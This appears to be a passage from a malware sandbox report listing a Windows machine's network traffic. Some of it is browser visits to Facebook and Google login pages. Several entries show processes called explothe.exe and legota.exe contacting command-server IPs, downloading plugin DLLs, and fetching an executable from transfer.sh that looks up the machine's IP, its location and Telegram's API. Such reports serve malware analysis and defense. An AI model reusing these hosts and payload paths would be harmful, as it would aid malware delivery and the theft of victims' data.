                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Connection: Keep-Alive
                                                  Host: fbsbx.com
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: image/gif
                                                  content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  Pragma: private
                                                  Cache-Control: private
                                                  Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: DENY
                                                  Access-Control-Allow-Origin: *
                                                  Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                  X-FB-Debug: /II+6fAyuVlhaEFSQDRqplOB2j9mAxOtKcGLMxYlqxsKgzV41YD0j5KAyLnw4BsA8/PoCRX8t5gAZqxmbiFgBg==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_popup_image_1.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: VavMdY6kTjDMa/KajpYRaQ==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 07:53:06 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: 88x8Rwfd9qDWBiRV9GFZVCXRKAcPvvtIhF+PAeW4/Cm69BNH7TGWTixqBixWAcFR9O4uHQQHYPufXgPhacjXrQ==
                                                  Date: Sat, 07 Oct 2023 07:53:06 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 50380
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_popup_image_3.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: YhcU5SV/bTVsWSaxO4wgGA==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 05:04:26 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  origin-agent-cluster: ?0
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: C79EYhXwImz/js8TNLSnHAucrGaQqMuqzNxGsZclYnVrKraZBoGbg/PBbOsBHEhQ8+BQHP5KZBMbcL1sfmTMUw==
                                                  Date: Sat, 07 Oct 2023 05:04:26 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 47657
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_popup_image_4.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: Ae8VnBRpCv1xxClCp11bLQ==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 05:03:34 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: gl7T2L1Upw+AD/fh3gDjd0Fyf0JM4RDxdJVoF0Cb2tx8BzKcb0YXL7h1a9jpI4V7X+rt4FgjvlsAWNPU8LvWng==
                                                  Date: Sat, 07 Oct 2023 05:03:34 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 38147
                                                • flag-nl
                                                  GET
                                                  https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.247.35:443
                                                  Request
                                                  GET /images/cookies/cookie_info_popup_image_2.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: www.facebook.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  content-md5: vq/Hc42i1NUD0re9tbXumw==
                                                  Edge-Control: cache-maxage=86400s
                                                  Expires: Sun, 08 Oct 2023 08:57:20 GMT
                                                  Cache-Control: public,max-age=86400
                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  Strict-Transport-Security: max-age=15552000; preload
                                                  X-FB-Debug: dNfxNJfmSKwMV3ld9T7n+rMRD9dwzQNr4OGdcXD3jTFUJrzoOe+GuxWgWnE95efAWbLsaocAi4Q4AU2Doivcxg==
                                                  Date: Sat, 07 Oct 2023 08:57:20 GMT
                                                  Connection: keep-alive
                                                  Content-Length: 47514
                                                • flag-us
                                                  DNS
                                                  accounts.youtube.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  accounts.youtube.com
                                                  IN A
                                                  Response
                                                  accounts.youtube.com
                                                  IN CNAME
                                                  www3.l.google.com
                                                  www3.l.google.com
                                                  IN A
                                                  142.250.179.206
                                                • flag-nl
                                                  GET
                                                  https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051&timestamp=1696680164550
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.250.179.206:443
                                                  Request
                                                  GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051&timestamp=1696680164550 HTTP/1.1
                                                  Accept: text/html, application/xhtml+xml, */*
                                                  Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: accounts.youtube.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: text/html; charset=utf-8
                                                  X-Frame-Options: ALLOW-FROM https://accounts.google.com
                                                  Content-Security-Policy: frame-ancestors https://accounts.google.com
                                                  Content-Security-Policy: script-src 'nonce-W1QqQ7EMM-iCaxhG_HoXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Cross-Origin-Opener-Policy: same-origin
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                  Content-Encoding: gzip
                                                  Server: ESF
                                                  X-XSS-Protection: 0
                                                  X-Content-Type-Options: nosniff
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-us
                                                  DNS
                                                  play.google.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  play.google.com
                                                  IN A
                                                  Response
                                                  play.google.com
                                                  IN A
                                                  142.251.36.14
                                                • flag-nl
                                                  POST
                                                  https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.251.36.14:443
                                                  Request
                                                  POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                  Accept: */*
                                                  X-Goog-AuthUser: 0
                                                  Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                  Referer: https://accounts.google.com/v3/signin/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: play.google.com
                                                  Content-Length: 859
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Set-Cookie: NID=511=DwiqE7ihP1cyw5nvb0qSi_l42kqPdkYLwWqIYW94krA2ea1Z4akMg64w8XEyRI_9na-sGYPcwQlG84-Tu_h3O5Onb4iFavFWwLYYR1fTZy5s3aVBM2Z-niQdZufcxj63Z4pfpkbWsq9Zd8_a8P1fwKkepa_UfuyJzMXRgEdyhOg; expires=Sun, 07-Apr-2024 12:02:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Access-Control-Allow-Origin: http://play.google.com
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Access-Control-Allow-Credentials: true
                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Encoding: gzip
                                                  Date: Sat, 07 Oct 2023 12:02:49 GMT
                                                  Server: Playlog
                                                  Cache-Control: private
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Expires: Sat, 07 Oct 2023 12:02:49 GMT
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  POST
                                                  https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.251.36.14:443
                                                  Request
                                                  POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                  Accept: */*
                                                  X-Goog-AuthUser: 0
                                                  Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                  Referer: https://accounts.google.com/v3/signin/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: play.google.com
                                                  Content-Length: 613
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Cookie: NID=511=DwiqE7ihP1cyw5nvb0qSi_l42kqPdkYLwWqIYW94krA2ea1Z4akMg64w8XEyRI_9na-sGYPcwQlG84-Tu_h3O5Onb4iFavFWwLYYR1fTZy5s3aVBM2Z-niQdZufcxj63Z4pfpkbWsq9Zd8_a8P1fwKkepa_UfuyJzMXRgEdyhOg
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Access-Control-Allow-Origin: http://play.google.com
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Access-Control-Allow-Credentials: true
                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Encoding: gzip
                                                  Date: Sat, 07 Oct 2023 12:03:18 GMT
                                                  Server: Playlog
                                                  Cache-Control: private
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-nl
                                                  POST
                                                  https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  142.251.36.14:443
                                                  Request
                                                  POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                  Accept: */*
                                                  X-Goog-AuthUser: 0
                                                  Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                  Referer: https://accounts.google.com/v3/signin/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: play.google.com
                                                  Content-Length: 370
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  Cookie: NID=511=DwiqE7ihP1cyw5nvb0qSi_l42kqPdkYLwWqIYW94krA2ea1Z4akMg64w8XEyRI_9na-sGYPcwQlG84-Tu_h3O5Onb4iFavFWwLYYR1fTZy5s3aVBM2Z-niQdZufcxj63Z4pfpkbWsq9Zd8_a8P1fwKkepa_UfuyJzMXRgEdyhOg
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Access-Control-Allow-Origin: http://play.google.com
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Access-Control-Allow-Credentials: true
                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Encoding: gzip
                                                  Date: Sat, 07 Oct 2023 12:03:18 GMT
                                                  Server: Playlog
                                                  Cache-Control: private
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Transfer-Encoding: chunked
                                                • flag-fi
                                                  GET
                                                  http://77.91.124.1/theme/Plugins/cred64.dll
                                                  explothe.exe
                                                  Remote address:
                                                  77.91.124.1:80
                                                  Request
                                                  GET /theme/Plugins/cred64.dll HTTP/1.1
                                                  Host: 77.91.124.1
                                                  Response
                                                  HTTP/1.1 404 Not Found
                                                  Date: Sat, 07 Oct 2023 12:03:25 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 273
                                                  Content-Type: text/html; charset=iso-8859-1
                                                • flag-fi
                                                  GET
                                                  http://77.91.124.1/theme/Plugins/clip64.dll
                                                  explothe.exe
                                                  Remote address:
                                                  77.91.124.1:80
                                                  Request
                                                  GET /theme/Plugins/clip64.dll HTTP/1.1
                                                  Host: 77.91.124.1
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:03:25 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
                                                  ETag: "16400-60691507c5cc0"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 91136
                                                  Content-Type: application/x-msdos-program
                                                • flag-fi
                                                  GET
                                                  http://77.91.68.78/help/Plugins/cred64.dll
                                                  legota.exe
                                                  Remote address:
                                                  77.91.68.78:80
                                                  Request
                                                  GET /help/Plugins/cred64.dll HTTP/1.1
                                                  Host: 77.91.68.78
                                                  Response
                                                  HTTP/1.1 404 Not Found
                                                  Date: Sat, 07 Oct 2023 12:03:25 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 273
                                                  Content-Type: text/html; charset=iso-8859-1
                                                • flag-fi
                                                  GET
                                                  http://77.91.68.78/help/Plugins/clip64.dll
                                                  legota.exe
                                                  Remote address:
                                                  77.91.68.78:80
                                                  Request
                                                  GET /help/Plugins/clip64.dll HTTP/1.1
                                                  Host: 77.91.68.78
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:03:25 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Last-Modified: Wed, 06 Sep 2023 11:40:52 GMT
                                                  ETag: "16400-604af373ed405"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 91136
                                                  Content-Type: application/x-msdos-program
                                                • flag-us
                                                  DNS
                                                  icanhazip.com
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  icanhazip.com
                                                  IN A
                                                  Response
                                                  icanhazip.com
                                                  IN A
                                                  104.18.115.97
                                                  icanhazip.com
                                                  IN A
                                                  104.18.114.97
                                                • flag-us
                                                  GET
                                                  http://icanhazip.com/
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  104.18.115.97:80
                                                  Request
                                                  GET / HTTP/1.1
                                                  Host: icanhazip.com
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:03:47 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 13
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET
                                                  Set-Cookie: __cf_bm=gweCdFHsX0j_34YxRW2X9_JgPskwBAUxCmeQHPa8M6k-1696680227-0-AdS7lQtJ2CB5dCxe3qTNIjh46J2JnUQh2v3VRVcNOFMjdiEktxILSpSr7DMpKi7Qy9PzSYDBsUxcrFcrHQF4HNE=; path=/; expires=Sat, 07-Oct-23 12:33:47 GMT; domain=.icanhazip.com; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 812600c01a322074-AMS
                                                  alt-svc: h3=":443"; ma=86400
                                                • flag-us
                                                  DNS
                                                  api.mylnikov.org
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  api.mylnikov.org
                                                  IN A
                                                  Response
                                                  api.mylnikov.org
                                                  IN A
                                                  104.21.44.66
                                                  api.mylnikov.org
                                                  IN A
                                                  172.67.196.114
                                                • flag-us
                                                  GET
                                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=66:2e:76:02:65:c2
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  104.21.44.66:443
                                                  Request
                                                  GET /geolocation/wifi?v=1.1&bssid=66:2e:76:02:65:c2 HTTP/1.1
                                                  Host: api.mylnikov.org
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Date: Sat, 07 Oct 2023 12:03:48 GMT
                                                  Content-Type: application/json; charset=utf8
                                                  Content-Length: 88
                                                  Connection: keep-alive
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: MISS
                                                  Last-Modified: Sat, 07 Oct 2023 12:03:48 GMT
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lRsx3VIzX2EVvdVXdomgMgCrJ5Kj%2FzHL99pGcSM1rUxHTvzAIFzAdlHLZjAFIoz5CE4w0hGclDBh142Flqdnbf1vfjqd%2FABJ3mrVtcGBi9uWpk5bVDMm6pHOKeoWNvN1PI5q"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Strict-Transport-Security: max-age=0; preload
                                                  X-Content-Type-Options: nosniff
                                                  Server: cloudflare
                                                  CF-RAY: 812600c4cda70a64-AMS
                                                  alt-svc: h3=":443"; ma=86400
                                                • flag-us
                                                  DNS
                                                  www.microsoft.com
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  www.microsoft.com
                                                  IN A
                                                  Response
                                                  www.microsoft.com
                                                  IN CNAME
                                                  www.microsoft.com-c-3.edgekey.net
                                                  www.microsoft.com-c-3.edgekey.net
                                                  IN CNAME
                                                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                  IN CNAME
                                                  e13678.dscb.akamaiedge.net
                                                  e13678.dscb.akamaiedge.net
                                                  IN A
                                                  104.85.1.163
                                                • flag-us
                                                  DNS
                                                  api.telegram.org
                                                  pf1sbMGHARiKj7J.exe
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  api.telegram.org
                                                  IN A
                                                  Response
                                                  api.telegram.org
                                                  IN A
                                                  149.154.167.220
                                                • 142.250.179.141:443
                                                  https://accounts.google.com/generate_204?XYk76A
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  2.3kB
                                                  6.8kB
                                                  12
                                                  13

                                                  HTTP Request

                                                  GET https://accounts.google.com/_/bscframe

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://accounts.google.com/generate_204?XYk76A

                                                  HTTP Response

                                                  204
                                                • 142.250.179.141:443
                                                  https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=c
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  6.7kB
                                                  130.5kB
                                                  67
                                                  116

                                                  HTTP Request

                                                  GET https://accounts.google.com/

                                                  HTTP Response

                                                  302

                                                  HTTP Request

                                                  GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

                                                  HTTP Response

                                                  302

                                                  HTTP Request

                                                  GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhd6Gg-ZZ8gnsrUFC39V_x7p34dPx0Lceo6Ly424wLygzYagAEShxXndyTyKJ4yjC6zwmnSM

                                                  HTTP Response

                                                  302

                                                  HTTP Request

                                                  GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://accounts.google.com/favicon.ico

                                                  HTTP Response

                                                  302

                                                  HTTP Request

                                                  POST https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=c

                                                  HTTP Response

                                                  200
                                                • 77.91.124.1:80
                                                  http://77.91.124.1/theme/index.php
                                                  http
                                                  explothe.exe
                                                  511 B
                                                  365 B
                                                  6
                                                  5

                                                  HTTP Request

                                                  POST http://77.91.124.1/theme/index.php

                                                  HTTP Response

                                                  200
                                                • 77.91.68.78:80
                                                  http://77.91.68.78/help/index.php
                                                  http
                                                  legota.exe
                                                  773 B
                                                  701 B
                                                  8
                                                  7

                                                  HTTP Request

                                                  POST http://77.91.68.78/help/index.php

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  POST http://77.91.68.78/help/index.php

                                                  HTTP Response

                                                  200
                                                • 144.76.136.153:443
                                                  https://transfer.sh/WOHjUAuTPg/pf1sbMGHARiKj7J.exe
                                                  tls, http
                                                  legota.exe
                                                  11.9kB
                                                  630.7kB
                                                  250
                                                  460

                                                  HTTP Request

                                                  GET https://transfer.sh/WOHjUAuTPg/pf1sbMGHARiKj7J.exe

                                                  HTTP Response

                                                  200
                                                • 2.18.121.68:80
                                                  http://apps.identrust.com/roots/dstrootcax3.p7c
                                                  http
                                                  legota.exe
                                                  421 B
                                                  1.6kB
                                                  6
                                                  5

                                                  HTTP Request

                                                  GET http://apps.identrust.com/roots/dstrootcax3.p7c

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_3.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  2.6kB
                                                  64.8kB
                                                  33
                                                  53

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

                                                  HTTP Response

                                                  200
                                                • 157.240.247.35:443
                                                  https://www.facebook.com/images/cookies/cookie_info_card_image_4.png
                                                  tls, http
                                                  IEXPLORE.EXE
                                                  3.2kB
                                                  80.6kB
                                                  41
                                                  68

                                                  HTTP Request

                                                  GET https://www.facebook.com/login

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

                                                  HTTP Response

                                                  200

                                                  HTTP Request

                                                  GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

                                                  HTTP Response

                                                  200
                                                • 157.240.201.35:443
